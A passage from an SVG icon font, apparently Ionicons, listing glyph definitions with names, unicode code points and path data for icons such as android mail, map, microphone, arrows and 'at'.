d="M280 262c22 0 40 -18 40 -40v-200c0 -22 -18 -40 -40 -40h-240c-22 0 -40 18 -40 40v200c0 22 18 40 40 40h20v40c0 55 45 100 100 100s100 -45 100 -100v-40h20zM160 80c22 0 40 18 40 40s-18 40 -40 40s-40 -18 -40 -40s18 -40 40 -40zM222 262v40c0 34 -28 62 -62 62
s-62 -28 -62 -62v-40h124z" />
    <glyph glyph-name="ion-android-mail" unicode="&#xf2eb;" 
d="M405 368c23 0 43 -20 43 -43v-266c0 -23 -20 -43 -43 -43h-362c-23 0 -43 20 -43 43v266c0 23 20 43 43 43h362zM400 277v43l-176 -117l-176 117v-43l176 -117z" />
    <glyph glyph-name="ion-android-map" unicode="&#xf393;" horiz-adv-x="384" 
d="M373 384c6 0 11 -5 11 -11v-322c0 -5 -3 -9 -7 -10l-121 -41l-128 45s-105 -41 -108 -42s-7 -3 -9 -3c-6 0 -11 5 -11 11v322c0 5 3 9 7 10l121 41l128 -45s103 40 108 42s7 3 9 3zM256 43v254l-128 44v-254z" />
    <glyph glyph-name="ion-android-menu" unicode="&#xf394;" horiz-adv-x="384" 
d="M0 64v43h384v-43h-384zM0 171v42h384v-42h-384zM0 320h384v-43h-384v43z" />
    <glyph glyph-name="ion-android-microphone-off" unicode="&#xf395;" horiz-adv-x="408" 
d="M316 93l58 -58l-58 58l58 -58l34 -33l-24 -24l-95 95c-19 -11 -40 -20 -62 -23v-82h-46v82c-75 10 -137 76 -137 153h39c0 -68 58 -117 121 -117c20 0 40 5 57 14l-32 33c-8 -3 -16 -5 -25 -5c-38 0 -69 31 -69 69v29l-135 134l24 24l111 -110v0l140 -140l5 -5l9 -9z
M273 197c0 -4 0 -8 -1 -12l-137 137v25c0 38 31 69 69 69s69 -31 69 -69v-150zM365 203c0 -31 -10 -60 -27 -84l-27 28c9 17 15 36 15 56h39zM408 2v0l-34 33z" />
    <glyph glyph-name="ion-android-microphone" unicode="&#xf2ec;" horiz-adv-x="320" 
d="M160 128c-38 0 -69 31 -69 69v150c0 38 31 69 69 69s69 -31 69 -69v-150c0 -38 -31 -69 -69 -69zM281 203h39c0 -78 -62 -142 -137 -153v-82h-46v82c-75 10 -137 75 -137 153h39c0 -69 58 -116 121 -116s121 47 121 116z" />
    <glyph glyph-name="ion-android-more-horizontal" unicode="&#xf396;" horiz-adv-x="320" 
d="M40 232c22 0 40 -18 40 -40s-18 -40 -40 -40s-40 18 -40 40s18 40 40 40zM280 232c22 0 40 -18 40 -40s-18 -40 -40 -40s-40 18 -40 40s18 40 40 40zM160 232c22 0 40 -18 40 -40s-18 -40 -40 -40s-40 18 -40 40s18 40 40 40z" />
    <glyph glyph-name="ion-android-more-vertical" unicode="&#xf397;" horiz-adv-x="80" 
d="M80 312c0 -22 -18 -40 -40 -40s-40 18 -40 40s18 40 40 40s40 -18 40 -40zM80 72c0 -22 -18 -40 -40 -40s-40 18 -40 40s18 40 40 40s40 -18 40 -40zM80 192c0 -22 -18 -40 -40 -40s-40 18 -40 40s18 40 40 40s40 -18 40 -40z" />
    <glyph glyph-name="ion-android-navigate" unicode="&#xf398;" horiz-adv-x="320" 
d="M160 384l160 -369l-15 -15l-145 64l-145 -64l-15 15z" />
    <glyph glyph-name="ion-android-notifications-none" unicode="&#xf399;" horiz-adv-x="352" 
d="M177 328h-2c-6 0 -24 -5 -24 -5c-46 -10 -78 -53 -78 -100v-114v-13l-9 -10l-8 -8h240l-8 8l-9 10v13v114c0 47 -32 90 -78 100c0 0 -17 5 -24 5zM176 400v0c18 0 31 -13 31 -31v-15c59 -14 104 -68 104 -131v-114l41 -42v-21h-352v21l41 42v114c0 63 45 117 104 131v15
c0 18 13 31 31 31zM217 26v0c0 -23 -18 -42 -41 -42s-41 19 -41 42h82z" />
    <glyph glyph-name="ion-android-notifications-off" unicode="&#xf39a;" horiz-adv-x="364" 
d="M182 -16c-23 0 -41 19 -41 42h82c0 -23 -18 -42 -41 -42zM57 341l295 -295v0l12 -12l-24 -24l-36 36h-298v21l41 41v115c0 23 6 44 16 63l-63 64l24 24l33 -33v0zM317 223v-94l-208 207c13 8 27 15 42 18v15c0 18 13 31 31 31s31 -13 31 -31v-15c59 -14 104 -67 104 -131
z" />
    <glyph glyph-name="ion-android-notifications" unicode="&#xf39b;" horiz-adv-x="352" 
d="M176 -16c-23 0 -41 19 -41 42h82c0 -23 -18 -42 -41 -42zM311 109l41 -42v-21h-352v21l41 42v114c0 63 45 117 104 131v15c0 18 13 31 31 31s31 -13 31 -31v-15c59 -14 104 -68 104 -131v-114z" />
    <glyph glyph-name="ion-android-open" unicode="&#xf39c;" horiz-adv-x="384" 
d="M341 43v133h43v-133c0 -23 -20 -43 -43 -43h-298c-23 0 -43 20 -43 43v298c0 23 20 43 43 43h133v-43h-133v-298h298zM224 384h160v-160h-43v87l-215 -215l-30 30l215 215h-87v43z" />
    <glyph glyph-name="ion-android-options" unicode="&#xf39d;" 
d="M0 32v32h272v-32h-272zM368 32v32h80v-32h-80zM352 0c0 -18 -14 -32 -32 -32v0c-18 0 -32 14 -32 32v96c0 18 14 32 32 32v0c18 0 32 -14 32 -32v-96zM0 176v32h80v-32h-80zM176 176v32h272v-32h-272zM160 144c0 -18 -14 -32 -32 -32v0c-18 0 -32 14 -32 32v96
c0 18 14 32 32 32v0c18 0 32 -14 32 -32v-96zM0 320v32h272v-32h-272zM368 320v32h80v-32h-80zM352 288c0 -18 -14 -32 -32 -32v0c-18 0 -32 14 -32 32v96c0 18 14 32 32 32v0c18 0 32 -14 32 -32v-96z" />
    <glyph glyph-name="ion-android-people" unicode="&#xf39e;" 
d="M305 216c-34 0 -61 27 -61 60s27 60 61 60s62 -27 62 -60s-28 -60 -62 -60zM143 216c-34 0 -62 27 -62 60s28 60 62 60s61 -27 61 -60s-27 -60 -61 -60zM143 172c48 0 145 -23 145 -70v-54h-288v54c0 47 95 70 143 70zM305 161c48 0 143 -12 143 -59v-54h-128v54
c0 30 -9 41 -32 58c7 1 11 1 17 1z" />
    <glyph glyph-name="ion-android-person-add" unicode="&#xf39f;" horiz-adv-x="480" 
d="M288 192c-53 0 -96 43 -96 96s43 96 96 96s96 -43 96 -96s-43 -96 -96 -96zM288 144c64 0 192 -32 192 -96v-48h-384v48c0 64 128 96 192 96zM96 224h64v-32h-64v-64h-32v64h-64v32h64v64h32v-64z" />
    <glyph glyph-name="ion-android-person" unicode="&#xf3a0;" horiz-adv-x="384" 
d="M192 192c-53 0 -96 43 -96 96s43 96 96 96s96 -43 96 -96s-43 -96 -96 -96zM192 144c64 0 192 -32 192 -96v-48h-384v48c0 64 128 96 192 96z" />
    <glyph glyph-name="ion-android-phone-landscape" unicode="&#xf3a1;" 
d="M448 89c0 -23 -19 -41 -41 -41h-366c-22 0 -41 18 -41 41v206c0 23 19 41 41 41h366c22 0 41 -18 41 -41v-206zM80 84h288v216h-288v-216z" />
    <glyph glyph-name="ion-android-phone-portrait" unicode="&#xf3a2;" horiz-adv-x="288" 
d="M247 416c23 0 41 -19 41 -41v-366c0 -22 -18 -41 -41 -41h-206c-23 0 -41 19 -41 41v366c0 22 18 41 41 41h206zM252 48v288h-216v-288h216z" />
    <glyph glyph-name="ion-android-pin" unicode="&#xf3a3;" horiz-adv-x="320" 
d="M160 416c88 0 160 -71 160 -157c0 -118 -160 -291 -160 -291s-160 173 -160 291c0 86 72 157 160 157zM160 203c32 0 57 25 57 56s-25 56 -57 56s-57 -25 -57 -56s25 -56 57 -56z" />
    <glyph glyph-name="ion-android-plane" unicode="&#xf3a4;" horiz-adv-x="384" 
d="M384 112l-160 48v-114l48 -31v-31l-80 16l-80 -16v31l48 31v114l-160 -48v40l160 104v113c0 18 15 31 32 31s32 -13 32 -31v-113l160 -104v-40z" />
    <glyph glyph-name="ion-android-playstore" unicode="&#xf2f0;" horiz-adv-x="416" 
d="M416 296c-19 -214 -13 -312 -13 -312h-390s6 96 -13 312h104c0 57 47 104 104 104s104 -47 104 -104h104zM208 374c-43 0 -78 -35 -78 -78h156c0 43 -35 78 -78 78zM156 50l143 85l-143 84v-169z" />
    <glyph glyph-name="ion-android-print" unicode="&#xf3a5;" horiz-adv-x="416" 
d="M352 288c35 0 64 -29 64 -64v-139h-80v-85h-256v85h-80v139c0 35 29 64 64 64h288zM304 32v128h-192v-128h192zM336 384v0v-80h-256v80h256z" />
    <glyph glyph-name="ion-android-radio-button-off" unicode="&#xf3a6;" horiz-adv-x="416" 
d="M208 400c114 0 208 -94 208 -208s-94 -208 -208 -208s-208 94 -208 208s94 208 208 208zM208 26c92 0 166 74 166 166s-74 166 -166 166s-166 -74 -166 -166s74 -166 166 -166z" />
    <glyph glyph-name="ion-android-radio-button-on" unicode="&#xf3a7;" horiz-adv-x="416" 
d="M208 296c57 0 104 -47 104 -104s-47 -104 -104 -104s-104 47 -104 104s47 104 104 104zM208 400c114 0 208 -94 208 -208s-94 -208 -208 -208s-208 94 -208 208s94 208 208 208zM208 26c92 0 166 74 166 166s-74 166 -166 166s-166 -74 -166 -166s74 -166 166 -166z" />
    <glyph glyph-name="ion-android-refresh" unicode="&#xf3a8;" horiz-adv-x="352" 
d="M176 60c56 0 104 34 123 84h46c-21 -74 -88 -128 -169 -128c-98 0 -176 79 -176 176s79 176 176 176c48 0 92 -20 124 -52l52 52v-154h-154l70 70c-23 24 -56 40 -92 40c-73 0 -132 -59 -132 -132s59 -132 132 -132z" />
    <glyph glyph-name="ion-android-remove-circle" unicode="&#xf3a9;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM315 171v42h-214v-42h214z" />
    <glyph glyph-name="ion-android-remove" unicode="&#xf2f4;" horiz-adv-x="320" 
d="M0 171v42h320v-42h-320z" />
    <glyph glyph-name="ion-android-restaurant" unicode="&#xf3aa;" horiz-adv-x="415" 
d="M116 168l-91 89c-34 33 -34 86 0 119l153 -148zM264 206l-33 -31l150 -145l-30 -30l-150 146l-150 -146l-30 30s163 159 211 207c-15 32 -4 77 31 111c41 40 101 49 132 17c33 -31 24 -89 -17 -129c-34 -34 -80 -45 -114 -30z" />
    <glyph glyph-name="ion-android-sad" unicode="&#xf3ab;" horiz-adv-x="416" 
d="M208 160c45 0 83 -26 102 -64h-204c19 38 57 64 102 64zM208 400c114 0 208 -94 208 -208s-93 -208 -208 -208s-208 94 -208 208s93 208 208 208zM208 26c92 0 166 74 166 166s-74 166 -166 166s-166 -74 -166 -166s74 -166 166 -166zM281 213c-18 0 -31 13 -31 31
s13 31 31 31s31 -13 31 -31s-13 -31 -31 -31zM135 213c-18 0 -31 13 -31 31s13 31 31 31s31 -13 31 -31s-13 -31 -31 -31z" />
    <glyph glyph-name="ion-android-search" unicode="&#xf2f5;" horiz-adv-x="384" 
d="M274 143l110 -110l-33 -33l-109 110v17l-7 6c-25 -21 -58 -34 -93 -34c-79 0 -142 63 -142 142s63 143 141 143c79 0 142 -64 142 -143c0 -36 -13 -68 -34 -93l7 -5h18zM142 143c55 0 99 43 99 98s-44 99 -99 99s-98 -44 -98 -99s43 -98 98 -98z" />
    <glyph glyph-name="ion-android-send" unicode="&#xf2f6;" horiz-adv-x="416" 
d="M0 0v149l298 43l-298 43v149l416 -192z" />
    <glyph glyph-name="ion-android-settings" unicode="&#xf2f7;" horiz-adv-x="416" 
d="M366 171l47 -34c3 -3 4 -10 2 -14l-43 -71c-2 -4 -7 -7 -12 -5l-54 21c-12 -8 -23 -16 -36 -21l-8 -55c-1 -4 -6 -8 -11 -8h-85c-5 0 -10 3 -11 8l-8 55c-13 5 -25 13 -36 21l-54 -21c-4 -2 -10 1 -12 5l-43 71c-3 5 -2 11 2 14l45 34c0 7 -1 14 -1 21s1 14 1 21l-46 34
c-3 3 -4 10 -2 14l43 71c2 4 7 7 12 5l54 -21c12 8 23 16 36 21l8 55c1 4 6 8 11 8h85c5 0 10 -4 11 -8l7 -55c13 -5 25 -13 36 -21l53 21c4 2 11 -1 13 -5l43 -71c3 -5 2 -11 -2 -14l-45 -34c0 -7 1 -14 1 -21s0 -15 -1 -21zM207 119c41 0 75 32 75 73s-34 73 -75 73
s-74 -32 -74 -73s33 -73 74 -73z" />
    <glyph glyph-name="ion-android-share-alt" unicode="&#xf3ac;" horiz-adv-x="384" 
d="M320 104c34 0 62 -28 62 -62s-28 -62 -62 -62s-62 28 -62 62c0 5 1 10 2 14l-152 88c-12 -11 -27 -17 -44 -17c-35 0 -64 29 -64 64s28 64 63 64c17 0 32 -6 44 -17l151 87c-1 5 -2 10 -2 15c0 35 29 64 64 64s64 -29 64 -64s-29 -64 -64 -64c-17 0 -32 6 -44 17
l-151 -87c1 -5 2 -10 2 -15s-1 -10 -2 -15l153 -88c11 11 26 16 42 16z" />
    <glyph glyph-name="ion-android-share" unicode="&#xf2f8;" horiz-adv-x="384" 
d="M384 200l-160 -147v88c-107 0 -171 -34 -224 -109c21 107 75 214 224 235v85z" />
    <glyph glyph-name="ion-android-star-half" unicode="&#xf3ad;" horiz-adv-x="404" 
d="M404 238l-110 -96l33 -142l-125 75l-125 -75l33 142l-110 96l145 12l57 134l57 -134zM219 103l60 -36l-16 68l-5 19l15 12l53 46l-70 6l-19 2l-8 18l-27 64v-189z" />
    <glyph glyph-name="ion-android-star-outline" unicode="&#xf3ae;" horiz-adv-x="404" 
d="M404 238l-110 -96l33 -142l-125 75l-125 -75l33 142l-110 96l145 12l57 134l57 -134zM219 103l60 -36l-16 68l-5 19l15 12l53 46l-70 6l-19 2l-8 18l-27 64l-27 -64l-8 -18l-19 -2l-70 -6l53 -46l15 -12l-5 -19l-16 -68l60 36l17 10z" />
    <glyph glyph-name="ion-android-star" unicode="&#xf2fc;" horiz-adv-x="404" 
d="M202 75l-125 -75l33 142l-110 96l145 12l57 134l57 -134l145 -12l-110 -96l33 -142z" />
    <glyph glyph-name="ion-android-stopwatch" unicode="&#xf2fd;" horiz-adv-x="384" 
d="M168 141v131h48v-131h-48zM344 278c25 -33 40 -74 40 -118c0 -106 -86 -192 -192 -192s-192 86 -192 192s86 192 192 192c44 0 85 -15 118 -40l31 30l33 -33zM298 54c28 28 44 66 44 106s-16 78 -44 106s-66 44 -106 44s-78 -16 -106 -44s-44 -66 -44 -106
s16 -78 44 -106s66 -44 106 -44s78 16 106 44zM128 368v48h128v-48h-128z" />
    <glyph glyph-name="ion-android-subway" unicode="&#xf3af;" horiz-adv-x="352" 
d="M176 400c94 0 176 -10 176 -85v-214c0 -42 -33 -74 -75 -74l27 -27v-16h-256v16l27 27c-42 0 -75 32 -75 74v214c0 75 82 85 176 85zM80 64c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM160 208v96h-112v-96h112zM272 64c18 0 32 14 32 32
s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM304 208v96h-112v-96h112z" />
    <glyph glyph-name="ion-android-sunny" unicode="&#xf3b0;" 
d="M224 288c-25 0 -50 -10 -68 -28s-28 -43 -28 -68s10 -50 28 -68s43 -28 68 -28s50 10 68 28s28 43 28 68s-10 50 -28 68s-43 28 -68 28zM245 416v0v-64h-42v64h42zM374 372v0l30 -30l-38 -38l-30 30zM74 372v0l38 -38l-30 -30l-38 38zM224 320v0c70 0 128 -58 128 -128
s-58 -128 -128 -128s-128 58 -128 128s58 128 128 128zM448 213v0v-42h-64v42h64zM64 213v0v-42h-64v42h64zM366 80v0l38 -38l-30 -30l-38 38zM82 80v0l30 -30l-38 -38l-30 30zM245 32v0v-64h-42v64h42z" />
    <glyph glyph-name="ion-android-sync" unicode="&#xf3b1;" horiz-adv-x="320" 
d="M160 355c88 0 160 -73 160 -163c0 -32 -9 -62 -25 -87l-29 30c9 17 14 37 14 57c0 67 -54 122 -120 122v-61l-80 82l80 81v-61zM160 70v61l80 -82l-80 -81v61c-88 0 -160 73 -160 163c0 32 9 63 25 87l29 -30c-9 -17 -14 -37 -14 -57c0 -67 54 -122 120 -122z" />
    <glyph glyph-name="ion-android-textsms" unicode="&#xf3b2;" horiz-adv-x="384" 
d="M344 384c22 0 40 -18 40 -40v-240c0 -22 -18 -40 -40 -40h-280l-64 -64v344c0 22 10 40 32 40h312zM134 206v40h-38v-40h38zM211 206v40h-38v-40h38zM288 206v40h-38v-40h38z" />
    <glyph glyph-name="ion-android-time" unicode="&#xf3b3;" horiz-adv-x="426" 
d="M213 405c117 0 213 -96 213 -213s-95 -213 -213 -213s-213 96 -213 213s95 213 213 213zM213 22c94 0 170 76 170 170s-76 170 -170 170s-170 -76 -170 -170s76 -170 170 -170zM224 298v-111l96 -57l-16 -26l-112 67v127h32z" />
    <glyph glyph-name="ion-android-train" unicode="&#xf3b4;" horiz-adv-x="352" 
d="M0 101v214c0 75 82 85 176 85s176 -10 176 -85v-214c0 -42 -33 -74 -75 -74l27 -27v-16h-256v16l27 27c-42 0 -75 32 -75 74zM176 72c22 0 40 18 40 40s-18 40 -40 40s-40 -18 -40 -40s18 -40 40 -40zM304 224v96h-256v-96h256z" />
    <glyph glyph-name="ion-android-unlock" unicode="&#xf3b5;" horiz-adv-x="320" 
d="M280 262c22 0 40 -18 40 -40v-200c0 -22 -18 -40 -40 -40h-240c-22 0 -40 18 -40 40v200c0 22 18 40 40 40h182v40v0c0 34 -28 62 -62 62s-62 -28 -62 -62h-38c0 55 45 100 100 100s100 -45 100 -100v-40h20zM160 80c22 0 40 18 40 40s-18 40 -40 40s-40 -18 -40 -40
s18 -40 40 -40z" />
    <glyph glyph-name="ion-android-upload" unicode="&#xf3b6;" horiz-adv-x="480" 
d="M387 231c52 -3 93 -46 93 -99c0 -55 -45 -100 -100 -100h-260c-66 0 -120 54 -120 120c0 62 47 113 107 119c25 48 75 81 133 81c73 0 133 -52 147 -121zM272 172h68l-100 100l-100 -100h68v-76h64v76z" />
    <glyph glyph-name="ion-android-volume-down" unicode="&#xf3b7;" horiz-adv-x="288" 
d="M0 256h85l107 112v-352l-107 112h-85v128zM288 192c0 -38 -21 -73 -53 -88v177c32 -16 53 -51 53 -89z" />
    <glyph glyph-name="ion-android-volume-mute" unicode="&#xf3b8;" horiz-adv-x="192" 
d="M0 256h85l107 112v-352l-107 112h-85v128z" />
    <glyph glyph-name="ion-android-volume-off" unicode="&#xf3b9;" horiz-adv-x="384" 
d="M342 192c0 69 -45 128 -107 147v45c85 -20 149 -99 149 -192c0 -35 -8 -68 -24 -96l-32 32c9 19 14 41 14 64zM192 368v-104l-51 51zM357 51v0l24 -24l-24 -24l-40 40c-23 -21 -51 -36 -82 -43v45c19 6 37 15 52 28l-95 95v-152l-107 112h-85v128h85l9 10l-91 91l24 24z
M288 192c0 -7 0 -15 -2 -22l-51 51v60c32 -16 53 -51 53 -89z" />
    <glyph glyph-name="ion-android-volume-up" unicode="&#xf3ba;" horiz-adv-x="384" 
d="M0 256h85l107 112v-352l-107 112h-85v128zM288 192c0 -38 -21 -73 -53 -88v177c32 -16 53 -51 53 -89zM235 384c85 -20 149 -99 149 -192s-64 -172 -149 -192v45c62 19 106 78 106 147s-44 128 -106 147v45z" />
    <glyph glyph-name="ion-android-walk" unicode="&#xf3bb;" horiz-adv-x="272" 
d="M168 336c-22 0 -40 18 -40 40s18 40 40 40s40 -18 40 -40s-18 -40 -40 -40zM168 216l-20 38l-20 -62l57 -96v-128h-38v96l-50 68l-57 -164h-40l81 320l-41 -16v-80h-40v112l111 38c4 1 10 1 13 1c13 0 23 -6 31 -18l45 -69h72v-40h-104z" />
    <glyph glyph-name="ion-android-warning" unicode="&#xf3bc;" 
d="M0 -16l224 416l224 -416h-448zM248 48v48h-48v-48h48zM248 128v96h-48v-96h48z" />
    <glyph glyph-name="ion-android-watch" unicode="&#xf3bd;" horiz-adv-x="320" 
d="M320 192c0 -51 -24 -96 -61 -125l-19 -115h-160l-19 115c-37 29 -61 74 -61 125s24 96 61 125l19 115h160l19 -115c37 -29 61 -74 61 -125zM40 192c0 -66 54 -120 120 -120s120 54 120 120s-54 120 -120 120s-120 -54 -120 -120z" />
    <glyph glyph-name="ion-android-wifi" unicode="&#xf305;" horiz-adv-x="416" 
d="M208 219c23 0 42 -18 42 -41s-19 -41 -42 -41s-42 18 -42 41s19 41 42 41zM333 178c0 -45 -26 -85 -63 -107l-20 36c25 14 41 40 41 71c0 45 -37 82 -83 82s-83 -37 -83 -82c0 -31 16 -57 41 -71l-20 -36c-37 22 -63 62 -63 107c0 68 56 124 125 124s125 -56 125 -124z
M208 384c114 0 208 -93 208 -206c0 -76 -42 -142 -104 -178l-21 36c50 28 83 81 83 142c0 91 -74 165 -166 165s-166 -74 -166 -165c0 -61 33 -113 83 -142l-21 -36c-62 36 -104 102 -104 178c0 113 94 206 208 206z" />
    <glyph glyph-name="ion-aperture" unicode="&#xf313;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM360 56c36 36 56 85 56 136s-20 100 -56 136s-85 56 -136 56s-100 -20 -136 -56s-56 -85 -56 -136s20 -100 56 -136s85 -56 136 -56s100 20 136 56zM168 342l56 -86h-147
c17 40 50 71 91 86zM381 160h-102l72 129c21 -27 33 -60 33 -97c0 -11 -1 -22 -3 -32zM328 314l-49 -90l-78 126c8 1 15 2 23 2c40 0 76 -14 104 -38zM67 224h102l-72 -129c-21 27 -33 60 -33 97c0 11 1 22 3 32zM280 42l-56 86h147c-17 -40 -50 -71 -91 -86zM120 70l49 90
l78 -126c-8 -1 -15 -2 -23 -2c-40 0 -76 14 -104 38z" />
    <glyph glyph-name="ion-archive" unicode="&#xf102;" 
d="M224 140l-128 116h80v96h96v-96h80zM433 151c11 -6 17 -19 15 -32l-9 -67c-2 -13 -9 -20 -28 -20h-374c-18 0 -26 7 -28 20l-9 67c-2 13 3 26 14 32l72 55h42l-62 -62h50c2 0 5 -1 6 -3l18 -45h168l18 45c1 2 3 3 5 3h51l-62 62h42z" />
    <glyph glyph-name="ion-arrow-down-a" unicode="&#xf103;" horiz-adv-x="384" 
d="M192 -0l-192 192h112v192h160v-192h112z" />
    <glyph glyph-name="ion-arrow-down-b" unicode="&#xf104;" horiz-adv-x="320" 
d="M3 263c-2 2 -3 6 -3 9c0 9 8 16 17 16v0h286v0c9 0 17 -7 17 -16c0 -3 -1 -6 -3 -8l-2 -3l-136 -156c-5 -5 -11 -9 -19 -9s-14 4 -19 9l-136 156z" />
    <glyph glyph-name="ion-arrow-down-c" unicode="&#xf105;" horiz-adv-x="274" 
d="M265 125l-105 -100c-6 -6 -14 -9 -23 -9s-16 3 -22 9l-106 100c-12 12 -12 31 0 43s34 12 46 0l50 -48v217c0 17 14 31 32 31s32 -14 32 -31v-217l50 48c12 12 34 12 46 0s12 -31 0 -43z" />
    <glyph glyph-name="ion-arrow-expand" unicode="&#xf25e;" horiz-adv-x="320" 
d="M178 238l64 64l-50 50h128v-128l-50 50l-64 -64zM178 146l28 28l64 -64l50 50v-128h-128l50 50zM142 146l-64 -64l50 -50h-128v128l50 -50l64 64zM142 238l-28 -28l-64 64l-50 -50v128h128l-50 -50z" />
    <glyph glyph-name="ion-arrow-graph-down-left" unicode="&#xf25f;" 
d="M0 64v160l61 -61l131 141l107 -112l149 128l-149 -203l-107 107l-94 -98l62 -62h-160z" />
    <glyph glyph-name="ion-arrow-graph-down-right" unicode="&#xf260;" 
d="M288 64l62 62l-94 98l-107 -107l-149 203l149 -128l107 112l131 -141l61 61v-160h-160z" />
    <glyph glyph-name="ion-arrow-graph-up-left" unicode="&#xf261;" 
d="M160 320l-62 -62l94 -98l107 107l149 -203l-149 128l-107 -112l-131 141l-61 -61v160h160z" />
    <glyph glyph-name="ion-arrow-graph-up-right" unicode="&#xf262;" 
d="M288 320h160v-160l-61 61l-131 -141l-107 112l-149 -128l149 203l107 -107l94 98z" />
    <glyph glyph-name="ion-arrow-left-a" unicode="&#xf106;" horiz-adv-x="384" 
d="M0 192l192 192v-112h192v-160h-192v-112z" />
    <glyph glyph-name="ion-arrow-left-b" unicode="&#xf107;" horiz-adv-x="192" 
d="M167 349c2 2 6 3 9 3c9 0 16 -8 16 -17v0v-286v0c0 -9 -7 -17 -16 -17c-3 0 -7 1 -9 3l-2 2l-156 136c-5 5 -9 11 -9 19s4 14 9 19l156 136z" />
    <glyph glyph-name="ion-arrow-left-c" unicode="&#xf108;" horiz-adv-x="352" 
d="M109 320c12 12 32 12 44 0s12 -34 0 -46l-49 -50h217c17 0 31 -14 31 -32s-14 -32 -31 -32h-217l48 -50c12 -12 12 -34 0 -46s-31 -12 -43 0l-100 106c-6 6 -9 13 -9 22s3 17 9 23z" />
    <glyph glyph-name="ion-arrow-move" unicode="&#xf263;" 
d="M448 192l-96 -96v76h-109l1 -108h76l-96 -96l-96 96h76v108h-108v-76l-96 96l96 96v-76h108v108h-76l96 96l96 -96h-76v-108h108v76z" />
    <glyph glyph-name="ion-arrow-resize" unicode="&#xf264;" horiz-adv-x="320" 
d="M192 352h128v-128l-50 50l-9 -9l-183 -183l50 -50h-128v128l50 -50l128 128v0l64 64z" />
    <glyph glyph-name="ion-arrow-return-left" unicode="&#xf265;" horiz-adv-x="384" 
d="M128 352v-64h248c4 0 8 -4 8 -8v-240c0 -4 -4 -8 -8 -8h-304c-4 0 -8 4 -8 8v48c0 4 4 8 8 8h248v128h-192v-64l-128 96z" />
    <glyph glyph-name="ion-arrow-return-right" unicode="&#xf266;" horiz-adv-x="384" 
d="M384 256l-128 -96v64h-192v-128h248c4 0 8 -4 8 -8v-48c0 -4 -4 -8 -8 -8h-304c-4 0 -8 4 -8 8v240c0 4 4 8 8 8h248v64z" />
    <glyph glyph-name="ion-arrow-right-a" unicode="&#xf109;" horiz-adv-x="384" 
d="M384 192l-192 -192v112h-192v160h192v112z" />
    <glyph glyph-name="ion-arrow-right-b" unicode="&#xf10a;" horiz-adv-x="192" 
d="M25 35c-2 -2 -6 -3 -9 -3c-9 0 -16 8 -16 17v0v286v0c0 9 7 17 16 17c3 0 6 -1 8 -3l3 -2l156 -136c5 -5 9 -11 9 -19s-4 -14 -9 -19l-156 -136z" />
    <glyph glyph-name="ion-arrow-right-c" unicode="&#xf10b;" horiz-adv-x="352" 
d="M243 320l100 -105c6 -6 9 -14 9 -23s-3 -16 -9 -22l-100 -106c-12 -12 -31 -12 -43 0s-12 34 0 46l48 50h-217c-17 0 -31 14 -31 32s14 32 31 32h217l-49 50c-12 12 -12 34 0 46s32 12 44 0z" />
    <glyph glyph-name="ion-arrow-shrink" unicode="&#xf267;" horiz-adv-x="384" 
d="M384 356l-82 -82l50 -50h-128v128l50 -50l82 82zM384 28l-28 -28l-82 82l-50 -50v128h128l-50 -50zM0 28l82 82l-50 50h128v-128l-50 50l-82 -82zM0 356l28 28l82 -82l50 50v-128h-128l50 50z" />
    <glyph glyph-name="ion-arrow-swap" unicode="&#xf268;" horiz-adv-x="384" 
d="M0 120c0 4 4 8 8 8h248v64l128 -96l-128 -96v64h-248c-4 0 -8 4 -8 8v48zM384 264c0 -4 -4 -8 -8 -8h-248v-64l-128 96l128 96v-64h248c4 0 8 -4 8 -8v-48z" />
    <glyph glyph-name="ion-arrow-up-a" unicode="&#xf10c;" horiz-adv-x="384" 
d="M192 384l192 -192h-112v-192h-160v192h-112z" />
    <glyph glyph-name="ion-arrow-up-b" unicode="&#xf10d;" horiz-adv-x="320" 
d="M317 121c2 -2 3 -6 3 -9c0 -9 -8 -16 -17 -16v0h-286v0c-9 0 -17 7 -17 16c0 3 1 6 3 8l2 3l136 156c5 5 11 9 19 9s14 -4 19 -9l136 -156z" />
    <glyph glyph-name="ion-arrow-up-c" unicode="&#xf10e;" horiz-adv-x="274" 
d="M9 259l105 100c6 6 14 9 23 9s16 -3 22 -9l106 -100c12 -12 12 -31 0 -43s-34 -12 -46 0l-50 48v-217c0 -17 -14 -31 -32 -31s-32 14 -32 31v217l-50 -49c-12 -12 -34 -12 -46 0s-12 32 0 44z" />
    <glyph glyph-name="ion-asterisk" unicode="&#xf314;" 
d="M448 224v-64l-186 10l104 -170l-56 -32l-86 176l-86 -176l-56 32l104 170l-186 -10v64l187 -7l-109 167l60 32l86 -176l86 176l60 -32l-109 -167z" />
    <glyph glyph-name="ion-at" unicode="&#xf10f;" 
d="M422 41c-24 -25 -52 -43 -85 -55s-69 -18 -105 -18c-35 0 -66 6 -95 17s-53 26 -73 46s-36 43 -47 71s-17 58 -17 90s6 62 18 89s29 51 50 71s46 35 74 47c28 11 58 17 90 17c28 0 55 -4 81 -12s49 -20 69 -36s36 -36 48 -60s18 -53 18 -85c0 -24 -3 -46 -10 -64
s-16 -34 -27 -46s-24 -22 -38 -28s-29 -10 -45 -10s-29 4 -39 12s-15 17 -15 29h-3c-6 -10 -15 -19 -28 -28s-28 -13 -46 -13c-28 0 -49 9 -64 27s-23 42 -23 71c0 17 3 34 9 50s14 31 24 44s23 23 38 31s31 12 49 12c15 0 27 -4 38 -10c10 -6 18 -15 21 -24h1l5 24h54
l-24 -113c-1 -6 -2 -12 -3 -19s-2 -13 -2 -19c0 -7 1 -13 4 -18s7 -7 15 -7c16 0 29 9 39 26s16 40 16 68c0 24 -4 45 -12 64s-20 34 -34 47s-32 23 -52 29s-41 9 -65 9c-26 0 -49 -4 -70 -13s-39 -22 -54 -38s-27 -34 -35 -56c-8 -21 -13 -44 -13 -69c0 -26 4 -51 13 -72
s21 -39 37 -54s35 -27 57 -35s46 -12 72 -12c33 0 61 6 85 16s45 25 65 43zM231 260c-10 0 -18 -2 -25 -8s-14 -13 -19 -22s-8 -18 -11 -28s-4 -20 -4 -30c0 -5 0 -10 1 -16c1 -5 3 -10 6 -15s7 -8 12 -11s11 -5 19 -5c11 0 20 3 28 8s14 13 19 21s9 16 11 26s3 19 3 27
